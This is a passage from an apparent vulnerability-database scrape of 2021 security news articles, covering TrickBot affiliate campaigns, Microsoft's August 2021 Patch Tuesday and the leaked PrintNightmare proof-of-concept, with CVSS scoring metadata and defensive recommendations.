customer-inquiry forms. This move not only increased the volume of its delivery attempts but also diversified delivery methods with the goal of infecting more potential victims than ever.\u201d\n\nBazarCall is a [distribution tactic](<https://unit42.paloaltonetworks.com/bazarloader-malware/>) that starts with emails offering \u201ctrial subscriptions\u201d to various services \u2013 with a phone number listed to call customer service to avoid being charged money. If someone calls, a call-center operator answers and directs victims to a website to purportedly unsubscribe from the service: a process the \u201cagent\u201d walks the caller through. In the end, vulnerable computers become infected with malware \u2013 usually the [BazarLoader implant](<https://threatpost.com/bazarloader-malware-slack-basecamp/165455/>), which is another malware in the TrickBot gang\u2019s arsenal, and sometimes TrickBot itself. These types of attacks have continued into the autumn, enhanced by the fresh distribution approaches, according to IBM.\n\nMeanwhile, since 2020, the TrickBot gang has been heavily involved in the ransomware economy, with the TrickBot malware acting as an initial access point in campaigns. Users infected with the trojan will see their device become part of a botnet that attackers typically use to load the second-stage ransomware variant. The operators have developed their own ransomware as well, according to IBM: the Conti code, which is notorious for hitting hospitals, [destroying backup files](<https://threatpost.com/conti-ransomware-backups/175114/>) and pursuing [double-extortion tactics](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>).\n\nIBM noted that since the two affiliates came on board in June, there\u2019s been a corresponding increase in Conti ransomware attacks \u2013 not likely a coincidence.\n\n\u201cRansomware and extortion go hand in hand nowadays,\u201d according to the firm\u2019s analysis. \u201c[The TrickBot gang] has also adapted to the ransomware economy through the creation of the Conti ransomware-as-a-service (RaaS) and the use of its BazarLoader and Trickbot payloads to gain a foothold for ransomware attacks.\u201d\n\n## **Affiliate Hive0106: Spam Powerhouse **\n\nIBM X-Force researchers noted that the most important development since June for the distribution of the TrickBot gang\u2019s various kinds of malware is the newly minted partnership with Hive0106 (aka TA551, Shathak and UNC2420).\n\nHive0106 specializes in massive volumes of spamming and is a financially motivated threat group that\u2019s lately been looking to partner with elite cybercrime gangs, the firm said.\n\nHive0106 campaigns begin with hijacking email threads: a tactic pioneered by its frenemy [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>). The tactic involves [jumping into ongoing correspondence](<https://unit42.paloaltonetworks.com/emotet-thread-hijacking/>) to respond to an incoming message under the guise of being the rightful account holder. These existing email threads are stolen from email clients during prior infections. Hive0106 is able to mount these campaigns at scale, researchers said, using newly created malicious domains to host malware payloads.\n\n\u201cThe emails include the email thread subject line but not the entire thread,\u201d according to IBM X-Force\u2019s writeup. \u201cWithin the email is an archive file containing a malicious attachment and password.\u201d\n\nIn the new campaigns, that malicious document drops an HTML application (HTA) file when macros are enabled.\n\n\u201cHTA files contain hypertext code and may also contain VBScript or JScript scripts, both of which are often used in boobytrapped macros,\u201d according to the analysis. \u201cThe HTA file then downloads Trickbot or BazarLoader, which has subsequently been observed downloading Cobalt Strike.\u201d\n\nCobalt Strike is the legitimate pen-testing tool that\u2019s [often abused by cybercriminals](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) to help with lateral movement. It\u2019s often a precursor to a ransomware infection.\n\n## **Hive0107 Comes on Board**\n\nAnother prominent affiliate that hooked its wagon up to the TrickBot gang this summer is Hive0107, which spent the first half of the year distributing the IcedID trojan (a [TrickBot rival](<https://threatpost.com/icedid-banking-trojan-surges-emotet/165314/>)). It switched horses to TrickBot in May, using its patented contact form distribution method.\n\nAnalysts \u201cobserved Hive0107 with occasional distribution campaigns of the Trickbot malware detected mid-May through mid-July 2021\u2026after that period, Hive0107 switched entirely to delivering BazarLoader,\u201d according to the researchers, who added that most of the campaigns target organizations in the U.S. and, to a lesser extent, Canada and Europe.\n\nHive0107 is well-known for using customer contact forms on company websites to send malicious links to unwitting employees. Usually, the messages it sends threaten legal action, according to the analysis.\n\nPreviously, the cybercriminals used copyright infringement as a ruse: \u201cThe group typically enters information into these contact forms \u2014 probably using automated methods \u2014 informing the targeted organization that it has illegally used copyrighted images and includes a link to their evidence,\u201d IBM X-Force researchers explained.\n\nIn the new campaigns, Hive0107 is using a different lure, the researchers said, claiming that the targeted company has been performing distributed denial-of-service (DDoS) attacks on its servers. Then, the messages provide a (malicious) link to purported evidence and how to remedy the situation.\n\nThe group also sends the same content via email to organization staff \u2013 an additional switch-up in tactics.\n\nIn any event, the links are hosted on legitimate cloud storage services where the payload lives, according to the analysis.\n\n\u201cClicking on the link downloads a .ZIP archive containing a malicious JScript (JS) downloader titled \u2018Stolen Images Evidence.js\u2019 or \u2018DDoS attack proof and instructions on how to fix it.js,'\u201d researchers explained. \u201cThe JS file contacts a URL on newly created domains to download BazarLoader.\u201d\n\nBazarLoader then goes on to download Cobalt Strike and a PowerShell script to exploit the [PrintNightmare vulnerability](<https://threatpost.com/microsoft-unpatched-printnightmare-zero-day/168613/>) (CVE-2021-34527), they added \u2013 and sometimes TrickBot.\n\n\u201cIBM suspects that access achieved through these Hive0107 campaigns is ultimately used to initiate a ransomware attack,\u201d the researchers noted.\n\nThe new affiliate campaigns are evidence of the TrickBot gang\u2019s continuing success breaking into the circle of the cybercriminal elite, the firm concluded \u2013 a trend IBM X-Force expects to continue into next year.\n\n\u201c[The gang] started out aggressively back in 2016 and has become a cybercrime staple in the Eastern European threat-actor arena,\u201d researchers said. \u201cIn 2021, the group has repositioned itself among the top of the cybercriminal industry.\u201d\n\nThey added, \u201cThe group already has demonstrated its ability to maintain and update its malware and infrastructure, despite the efforts of law enforcement and industry groups [to take it down](<https://threatpost.com/authorities-arrest-trickbot-member/169236/>).\u201d\n\n## **How to Protect Companies When TrickBot Hits**\n\nTo reduce the chances of suffering catastrophic damage from an infection (or a follow-on ransomware attack), IBM recommends taking the following steps:\n\n * **Ensure you have backup redundancy**, stored separately from network zones attackers could access with read-only access. The availability of effective backups is a significant differentiator for organizations and can support recovery from a ransomware attack.\n * **Implement a strategy to prevent unauthorized data theft**, especially as it applies to uploading large amounts of data to legitimate cloud storage platforms that attackers can abuse.\n * **Employ user-behavior analytics** to identify potential security incidents. When triggered, assume a breach has taken place. Audit, monitor and quickly act on suspected abuse related to privileged accounts and groups.\n * **Employ multi-factor authentication** on all remote access points into an enterprise network.\n * **Secure or disable remote desktop protocol (RDP).** Multiple ransomware attacks have been known to exploit weak RDP access to gain initial entry into a network.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls **_](<https://threatpost.com/category/webinars/>)_**\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-15T18:05:29", "type": "threatpost", "title": "TrickBot Gang Enters Cybercrime Elite with Fresh Affiliates", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-10-15T18:05:29", "id": "THREATPOST:827A7E3B49365A0E49A11A05A5A29192", "href": "https://threatpost.com/trickbot-cybercrime-elite-affiliates/175510/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-08-11T19:56:07", "description": "Microsoft has patched 51 security vulnerabilities in its scheduled August Patch Tuesday update, including seven critical bugs, two issues that were publicly disclosed but unpatched until now, and one that\u2019s listed as a zero-day that has been exploited in the wild.\n\nOf note, there are 17 elevation-of-privilege (EoP) vulnerabilities, 13 remote code-execution (RCE) issues, eight information-disclosure flaws and two denial-of-service (DoS) bugs.\n\nThe update also includes patches for three more Print Spooler bugs, familiar from the PrintNightmare saga.\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/>)\n\n\u201cFortunately, it was a lighter month than usual,\u201d said Eric Feldman, senior product marketing manager at Automox, in a [Patch Tuesday analysis](<https://blog.automox.com/automox-experts-weigh-in-august-patch-tuesday-2021>) from the vendor. \u201cThis represents a 56 percent reduction in overall vulnerabilities from July, and 33 percent fewer vulnerabilities on average for each month so far this year. We have also seen a similar reduction in critical vulnerabilities this month, with 30 percent less compared to the monthly average.\u201d\n\n## **Windows Critical Security Vulnerabilities**\n\nThe seven critical bugs [addressed in August](<https://msrc.microsoft.com/update-guide/>) are as follows:\n\n * CVE-2021-26424 \u2013 Windows TCP/IP RCE Vulnerability\n * CVE-2021-26432 \u2013 Windows Services for NFS ONCRPC XDR Driver RCE Vulnerability\n * CVE-2021-34480 \u2013 Scripting Engine Memory Corruption Vulnerability\n * CVE-2021-34530 \u2013 Windows Graphics Component RCE Vulnerability\n * CVE-2021-34534 \u2013 Windows MSHTML Platform RCE Vulnerability\n * CVE-2021-34535 \u2013 Remote Desktop Client RCE Vulnerability\n * CVE-2021-36936 \u2013 Windows Print Spooler RCE Vulnerability\n\nThe bug tracked as **CVE-2021-26424** exists in the TCP/IP protocol stack identified in Windows 7 and newer Microsoft operating systems, including servers.\n\n\u201cDespite its CVSS rating of 9.9, this may prove to be a trivial bug, but it\u2019s still fascinating,\u201d said Dustin Childs of Trend Micro\u2019s Zero Day Initiative (ZDI) in his [Tuesday analysis](<https://www.zerodayinitiative.com/blog/2021/8/10/the-august-2021-security-update-review>). \u201cAn attacker on a guest Hyper-V OS could execute code on the host Hyper-V server by sending a specially crafted IPv6 ping. This keeps it out of the wormable category. Still, a successful attack would allow the guest OS to completely take over the Hyper-V host. While not wormable, it\u2019s still cool to see new bugs in new scenarios being found in protocols that have been around for years.\u201d\n\nThe next bug, **CVE-2021-26432** in Windows Services, is more likely to be exploited given its low complexity status, according to Microsoft\u2019s advisory; it doesn\u2019t require privileges or user interaction to exploit, but Microsoft offered no further details.\n\n\u201cThis may fall into the \u2018wormable\u2019 category, at least between servers with NFS installed, especially since the open network computing remote procedure call (ONCRPC) consists of an External Data Representation (XDR) runtime built on the Winsock Kernel (WSK) interface,\u201d Childs said. \u201cThat certainly sounds like elevated code on a listening network service. Don\u2019t ignore this patch.\u201d\n\nAleks Haugom, product marketing manager at Automox, added, \u201cExploitation results in total loss of confidentiality across all devices managed by the same security authority. Furthermore, attackers can utilize it for denial-of-service attacks or to maliciously modify files. So far, no further details have been divulged by Microsoft or the security researcher (Liubenjin from Codesafe Team of Legendsec at Qi\u2019anxin Group) that discovered this vulnerability. Given the broad potential impact, its label \u2018Exploitation More Likely\u2019 and apparent secrecy, patching should be completed ASAP.\u201d\n\nMeanwhile, the memory-corruption bug (**CVE-2021-34480**) arises from how the scripting engine handles objects in memory, and it also allows RCE. Using a web-based attack or a malicious file, such as a malicious landing page or phishing email, attackers can use this vulnerability to take control of an affected system, install programs, view or change data, or create new user accounts with full user rights.\n\n\u201cCVE-2021-34480 should also be a priority,\u201d Kevin Breen, director of cyber-threat research at Immersive Labs, told Threatpost. \u201cIt is a low score in terms of CVSS, coming in at 6.8, but has been marked by Microsoft as \u2018Exploitation More Likely\u2019 because it is the type of attack commonly used to increase the success rate of spear phishing attacks to gain network access. Simple, but effective.\u201d\n\nThe Windows Graphic Component bug (**CVE-2021-34530**) allows attackers to remotely execute malicious code in the context of the current user, according to Microsoft \u2013 if they can social-engineer a target into opening a specially crafted file.\n\nAnother bug exists in the Windows MSHTML platform, also known as Trident (**CVE-2021-34534**). Trident is the rendering engine (mshtml.dll) used by Internet Explorer. The bug affects many Windows 10 versions (1607, 1809,1909, 2004, 20H2, 21H1) as well as Windows Server 2016 and 2019.\n\nBut while it potentially affects a large number of users, exploitation is not trivial.\n\n\u201cTo exploit, a threat actor would need to pull off a highly complex attack with user interaction \u2013 still entirely possible with the sophisticated attackers of today,\u201d said Peter Pflaster, technical product marketing manager at Automox.\n\nThe bug tracked as **CVE-2021-34535** impacts the Microsoft Remote Desktop Client, Microsoft\u2019s nearly ubiquitous utility for connecting to remote PCs.\n\n\u201cWith today\u2019s highly dispersed workforce, CVE-2021-34535, an RCE vulnerability in Remote Desktop Clients, should be a priority patch,\u201d said Breen. \u201cAttackers increasingly use RDP access as the tip of the spear to gain network access, often combining it with privilege escalation to move laterally. These can be powerful as, depending on the method, it may allow the attacker to authenticate in the network in the same way a user would, making detection difficult.\u201d\n\nIt\u2019s not as dangerous of a bug [as BlueKeep,](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) according to Childs, which also affected RDP.\n\n\u201cBefore you start having flashbacks to BlueKeep, this bug affects the RDP client and not the RDP server,\u201d he said. \u201cHowever, the CVSS 9.9 bug is nothing to ignore. An attacker can take over a system if they can convince an affected RDP client to connect to an RDP server they control. On Hyper-V servers, a malicious program running in a guest VM could trigger guest-to-host RCE by exploiting this vulnerability in the Hyper-V Viewer. This is the more likely scenario and the reason you should test and deploy this patch quickly.\u201d\n\n## **Windows Print Spooler Bugs \u2013 Again**\n\nThe final critical bug is **CVE-2021-36936**, a Windows Print Spooler RCE bug that\u2019s listed as publicly known.\n\nPrint Spooler made headlines last month, when Microsoft patched what it thought was a minor elevation-of-privilege vulnerability in the service (CVE-2021-1675). But the listing was updated later in the week, after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE \u2013 [requiring a new patch](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>).\n\nIt also disclosed a second bug, similar to PrintNightmare (CVE-2021-34527); and a third, [an EoP issue](<https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/>) ([CVE-2021-34481](<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>)).\n\n\u201cAnother month, another remote code-execution bug in the Print Spooler,\u201d said ZDI\u2019s Childs. \u201cThis bug is listed as publicly known, but it\u2019s not clear if this bug is a variant of PrintNightmare or a unique vulnerability all on its own. There are quite a few print-spooler bugs to keep track of. Either way, attackers can use this to execute code on affected systems. Microsoft does state low privileges are required, so that should put this in the non-wormable category, but you should still prioritize testing and deployment of this critical-rated bug.\u201d\n\nThe critical vulnerability is just one of three Print Spooler issues in the August Patch Tuesday release.\n\n\u201cThe specter of the PrintNightmare continues to haunt this patch Tuesday with three more print spooler vulnerabilities, CVE-2021-36947, CVE-2021-36936 and CVE-2021-34481,\u201d said Breen. \u201cAll three are listed as RCE over the network, requiring a low level of access, similar to PrintNightmare. Microsoft has marked these as \u2018Exploitation More Likely\u2019 which, if the previous speed of POC code being published is anything to go by, is certainly true.\u201d\n\n## **RCE Zero-Day in Windows Update Medic Service **\n\nThe actively exploited bug is tracked as **CVE-2021-36948** and is rated as important; it could pave the way for RCE via the Windows Update Medic Service in Windows 10 and Server 2019 and newer operating systems.\n\n\u201cUpdate Medic is a new service that allows users to repair Windows Update components from a damaged state such that the device can continue to receive updates,\u201d Automox\u2019 Jay Goodman explained. \u201cThe exploit is both low complexity and can be exploited without user interaction, making this an easy vulnerability to include in an adversary\u2019s toolbox.\u201d\n\nImmersive\u2019s Breen added, \u201cCVE-2021-36948 is a privilege-escalation vulnerability \u2013 the cornerstone of modern intrusions as they allow attackers the level of access to do things like hide their tracks and create user accounts. In the case of ransomware attacks, they have also been used to ensure maximum damage.\u201d\n\nThough the bug is being reported as being exploited in the wild by Microsoft, activity appears to remain limited or targeted: \u201cWe have seen no evidence of it at Kenna Security at this time,\u201d Jerry Gamblin, director of security research at Kenna Security (now part of Cisco) told Threatpost.\n\n## **Publicly Known Windows LSA Spoofing Bug**\n\nThe second publicly known bug (after the Print Spooler issue covered earlier) is tracked as **CVE-2021-36942**, and it\u2019s an important-rated Windows LSA (Local Security Authority) spoofing vulnerability.\n\n\u201cIt fixes a flaw that could be used to steal NTLM hashes from a domain controller or other vulnerable host,\u201d Immersive\u2019s Breen said. \u201cThese types of attacks are well known for lateral movement and privilege escalation, as has been demonstrated recently by a [new exploit called PetitPotam](<https://threatpost.com/microsoft-petitpotam-poc/168163/>). It is a post-intrusion exploit \u2013 further down the attack chain \u2013 but still a useful tool for attackers.\u201d\n\nChilds offered a bit of context around the bug.\n\n\u201cMicrosoft released this patch to further protect against NTLM relay attacks by issuing this update to block the LSARPC interface,\u201d he said. \u201cThis will impact some systems, notably Windows Server 2008 SP2, that use the EFS API OpenEncryptedFileRawA function. You should apply this to your Domain Controllers first and follow the additional guidance in [ADV210003](<https://msrc.microsoft.com/update-guide/vulnerability/ADV210003>) and [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>). This has been an ongoing issue since 2009, and, likely, this isn\u2019t the last we\u2019ll hear of this persistent issue.\u201d\n\nMicrosoft\u2019s next Patch Tuesday will fall on September 14.\n\n![Threatpost Webinar Series ](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/27093135/threatpost-webinar-300x51.jpg)Worried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-10T21:17:58", "type": "threatpost", "title": "Actively Exploited Windows Zero-Day Gets a Patch", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26424", "CVE-2021-26432", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34527", "CVE-2021-34530", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-36936", "CVE-2021-36942", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2021-08-10T21:17:58", "id": "THREATPOST:8D4EA8B0593FD44763915E703BC9AB72", "href": "https://threatpost.com/exploited-windows-zero-day-patch/168539/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-01T12:50:21", "description": "UPDATE\n\nA proof-of-concept for a critical Windows security vulnerability that allows remote code execution (RCE) was dropped on GitHub on Tuesday \u2013 and while it was taken back down within a few hours, the code was copied and is still out there circulating on the platform.\n\nThe bug ([CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>)) exists in the Windows Print Spooler and has been dubbed \u201cPrintNightmare\u201d by researchers. It was originally addressed in [June\u2019s Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>) from Microsoft as a minor elevation-of-privilege vulnerability, but the listing was updated last week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE. The patch, according to many, appears to fail against the RCE aspect of the bug.\n\n\u201cThere are 40 entries in Microsoft\u2019s list of affected products, from Windows 7 to Windows 10 and from Server 2008 to Server 2019,\u201d Dirk Schrader, global vice president of security research at New Net Technologies (NNT), now part of Netwrix, told Threatpost. \u201cGiven this broad surface, it is likely that this vulnerability will become an element in the tool chain of current malware families.\u201d\n\nOn Sunday, the QiAnXin security team [tweeted a video](<https://twitter.com/RedDrip7/status/1409353110187757575>) showing successful RCE \u2013 but it held back any technical or PoC details. Two days later, though, a full-blown PoC with a complete technical analysis appeared on GitHub, authored by another security firm, Sangfor.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nClaire Tills, senior security engineer with Tenable, which spotted the PoC posting, noted that \u201cthe GitHub repository was publicly available long enough for others to clone it. The PoC is likely still circulating and is likely to resurface publicly, if it hasn\u2019t already done so.\u201d\n\nAnd indeed, according to one security practitioner, the code was successfully forked to another page.\n\n> Looks like the original PoC for PrintNightmare (CVE-2021-1675) got deleted but someone has forked it since <https://t.co/8MiP62SlzC>\n> \n> \u2014 Andy Gill (@ZephrFish) [June 29, 2021](<https://twitter.com/ZephrFish/status/1409838221303988227?ref_src=twsrc%5Etfw>)\n\nOn Wednesday, other researchers [tweeted videos](<https://twitter.com/gentilkiwi/status/1410246348784422916>) and more [analysis](<https://twitter.com/cube0x0/status/1409928527957344262>) that could be used for successful exploitation as word spread of the PoC.\n\n> Impacket implementation of CVE-2021-1675 \ud83d\udd25<https://t.co/UpKOueij4c>\n> \n> \u2014 Cube0x0 (@cube0x0) [June 29, 2021](<https://twitter.com/cube0x0/status/1409928527957344262?ref_src=twsrc%5Etfw>)\n\nIt should be noted that some sources are also saying that the existing Microsoft patch doesn\u2019t remedy the RCE version. Cube0x0\u2019a impacket implementation above for instance works on a fully patched Windows machine, [the authors said](<https://github.com/cube0x0/CVE-2021-1675>).\n\n\u201cWe\u2019re still evaluating the efficacy of the patch ourselves, but there are multiple reports indicating the proof-of-concept code works against fully patched systems,\u201d Dustin Childs, of Trend Micro\u2019s Zero Day Initiative, told Threatpost. \u201cThis does indicate the patch released in June does not completely address the root cause of the bug. Either way, enterprises should treat this as an incomplete fix and implement other workarounds, such as disabling the print spooler and blocking TCP ports 135 and 445 at the perimeter.\u201d\n\nHe made note of Microsoft\u2019s CVE nomenclature too: \u201cIt\u2019s curious that the CVE here is -1675 while most of the CVEs Microsoft patched in June are -31000 and higher. This could be an indicator that they have known about this bug for some time, and fully addressing it is not trivial.\u201d\n\nRyan Garbars, application security engineer at Automox, told Threatpost that his team was working on replicating the exploit on a patched machine.\n\n\u201cNumerous sources state that the PrintNightmare vulnerability is not CVE-2021-1675, indicating that the most recent Windows patch will not protect against the vulnerability,\u201d he said. \u201cTo make sure that their environment is secure from this vulnerability users should disable the Spooler service within their environment, if possible.\u201d\n\nRapid7 researchers meanwhile [noted that](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) they \u201chave confirmed that public exploits work against fully patched Windows Server 2019 installations.\u201d\n\n## **PrintNightmare: Full Remote Takeover**\n\nSuccessful exploitation of CVE-2021-1675 could open the door to complete system takeover by remote adversaries. However, to achieve that requires a targeted user to be authenticated to the Spooler service.\n\n\u201cThis vulnerability can provide full domain access to a domain controller under a SYSTEM context,\u201d Marius Sandbu, guild lead for public cloud at TietoEVRY, added in a [Wednesday writeup,](<https://msandbu.org/printnightmare-cve-2021-1675/>) \u201cTo be able to use this exploit it requires that you authenticate as a domain user.\u201d\n\nTenable\u2019s Tillis added, \u201cBased on the information available, an attacker with a low-level user account could exploit this vulnerability\u2026and pivot to other areas of the target network. The low-level account could be obtained via an additional vulnerability or even a phishing attack.\u201d\n\n\u201cThe PrintNightmare vulnerability can be utilized to perform local privilege escalation and remote code execution within Windows environments through the Spooler service by exploiting the RpcAddPrinterDriver call, allowing for an arbitrary DLL to be loaded on the remote system, or as an escalated user,\u201d Automox\u2019 Garber told Threatpost. \u201cTo exploit the remote code-execution portion of the vulnerability, it is required to have a user authenticate to the Spooler service on the target system. Considering it is common to have the Spooler service enabled on most Windows systems in a standard domain environment, this vulnerability is very dangerous and can allow an attacker to easily gain remote code execution through the Windows environment with a single set of credentials.\u201d\n\nMicrosoft updated its advisory to note the potential for RCE, but didn\u2019t update the CVSS rating, despite noting that exploitation would require \u201clow complexity.\u201d For their part, researchers are treating PrintNightmare as having \u201ccritical\u201d status.\n\n\u201cIt\u2019s interesting to note Microsoft did not change the CVSS rating when they revised their advisory to indicate this could lead to remote code execution,\u201d Childs said, adding that the bug is now \u201cquite severe.\u201d He added, \u201cI would treat this as a critical-rated bug.\u201d\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/30111452/PoC-PrintNightmare.png)\n\nThe Sangfor PoC found on GitHib.\n\n\u201cWithout authentication, the flaw could be exploited to elevate privileges, making this vulnerability a valuable link in an attack chain,\u201d Tillis noted.\n\nThe team at Sangfor (researchers Zhiniang Peng and Xuefeng Li) said in their GitHub posting (the copied version [is here](<https://github.com/afwu/PrintNightmare>)) that in the domain controller (DC) environment, the Print Spooler service is normally enabled, so the compromise of any DC user could likely result in RCE.\n\n## **More Print Spooler Bugs and Exploits Coming Soon**\n\nThey also claimed to have found \u201cmore hidden bombs\u201d in Print Spooler, which they plan to unveil at Black Hat in August.\n\n\u201cWindows Print Spooler has a long history of vulnerabilities and its ubiquity can allow for serious impact on targets,\u201d Tillis noted in the Tenable [writeup on Tuesday](<https://www.tenable.com/blog/cve-2021-1675-proof-of-concept-leaked-for-critical-windows-print-spooler-vulnerability>). \u201cMost notably, Print Spooler vulnerabilities were tied to the Stuxnet attacks over a decade ago. More recently, CVE-2020-1337 was a zero-day in print spooler disclosed at last year\u2019s Black Hat and DEF CON events, which happened to be a patch bypass for CVE-2020-1048, another Windows Print Spooler vulnerability that was patched in May 2020.\u201d\n\n\u201cSince the proof-of-concept code has leaked online in various locations, expect this but to be wrapped up into active exploits soon,\u201d Childs said. \u201cThis threat will likely increase after Black Hat when researchers present their findings on the bugs.\u201d\n\nThe patch may not be completely effective, but there are mitigations, such as taking Print Spooler offline. And, \u201cit should be noted that most endpoints will be safe from this attack with the built-in Windows Firewall default rules,\u201d Sandbu said.\n\nSchrader added that users should regularly check for system integrity and control changes.\n\n\u201cAs the vulnerability gives an attacker full control related to confidentiality, integrity and availability, users should also be cautious about their sensitive data,\u201d he said.\n\n_**This article was updated at 3 p.m. ET on June 30 with additional input from security researchers.**_\n", "cvss3": {}, "published": "2021-06-30T16:02:29", "type": "threatpost", "title": "PoC Exploit Circulating for Critical Windows Print Spooler Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1048", "CVE-2020-1337", "CVE-2021-1675"], "modified": "2021-06-30T16:02:29", "id": "THREATPOST:EED27183B3F49112A9E785EA56534781", "href": "https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:14", "description": "[![Windows Print Spooler RCE Vulnerability](https://thehackernews.com/images/-otyRXbM_lrE/YRSmPS71hoI/AAAAAAAADgQ/tTqtA8hUI7kXtRqLCssO2jaV1gRO-zUdACLcBGAsYHQ/s728-e1000/printer-hack.gif)](<https://thehackernews.com/images/-otyRXbM_lrE/YRSmPS71hoI/AAAAAAAADgQ/tTqtA8hUI7kXtRqLCssO2jaV1gRO-zUdACLcBGAsYHQ/s0/printer-hack.gif>)\n\nA day after releasing [Patch Tuesday updates](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>), Microsoft acknowledged yet another remote code execution vulnerability in the Windows Print Spooler component, adding that it's working to remediate the issue in an upcoming security update.\n\nTracked as [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) (CVSS score: 7.3), the unpatched flaw is the latest to join a [list](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>) of [bugs](<https://thehackernews.com/2021/07/researcher-uncover-yet-another.html>) collectively known as [PrintNightmare](<https://www.cnet.com/news/2021/08/microsoft-releases-windows-updates-to.html%20https://suppor>) that have plagued the printer service and come to light in recent months. Victor Mata of FusionX, Accenture Security, who has been credited with reporting the flaw, [said](<https://twitter.com/offenseindepth/status/1425574625384206339>) the issue was disclosed to Microsoft in December 2020.\n\n\"A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\" the company said in its out-of-band bulletin, echoing the vulnerability details for [CVE-2021-34481](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>). \"An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\"\n\n[![Windows Print Spooler RCE 